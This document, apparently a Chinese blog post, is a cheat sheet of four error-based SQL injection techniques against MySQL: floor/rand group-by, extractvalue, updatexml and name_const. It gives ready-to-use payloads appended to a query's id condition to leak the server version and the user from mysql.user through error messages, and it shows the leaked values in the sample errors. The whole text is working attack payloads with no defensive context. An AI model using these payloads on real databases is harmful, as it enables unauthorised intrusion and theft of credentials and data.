mysql的注入的四种高级报错方式

1、floor
方法一:
      
  1. mysql > select * from article where id = 1 and ( select 1 from ( select count (*), concat ( version (), floor ( rand ( 0 )* 2 )) x from information_schema . tables group by x ) a );
          
  1. mysql > select * from article where id = 1 and ( select 1 from ( select count (*), concat (( select user from mysql.user limit 1 ), floor ( rand ( 0 )* 2 )) x from information_schema . tables group by x ) a );
            
  1. ERROR 1062 ( 23000 ): Duplicate entry 'root1' for key 'group_key'

方法二:
        
  1. mysql> select * from article where id = 1 and ( select count (*) from ( select 1 union select null union select ! 1 ) x group by concat (( select user from mysql.user limit 1 ), floor ( rand ( 0 )* 2 )));
          
  1. ERROR 1062 ( 23000 ): Duplicate entry 'root1' for key 'group_key'

2、ExtractValue
        
  1. mysql > select * from article where id = 1 and extractvalue ( 1 , concat ( 0x5c ,( select user from mysql . user limit 1 )));
          
  1. ERROR 1105 ( HY000 ): XPATH syntax error : '\root'

3、UpdateXml
        
  1. mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select user from mysql.user limit 1),0x5e24),1));
结果:
        
  1. ERROR 1105 ( HY000 ): XPATH syntax error : '^$root^$'

4、Name_cast
        
  1. mysql > select * from article where id = 1 and exists ( select * from ( select * from ( select name_const (@ @version , 0 )) a join ( select name_const (@ @version , 0 )) b ) c );
          
  1. ERROR 1210 ( HY000 ): Incorrect arguments to NAME_CONST
<5.5.20-log版本提示错误,低版本5.0可以>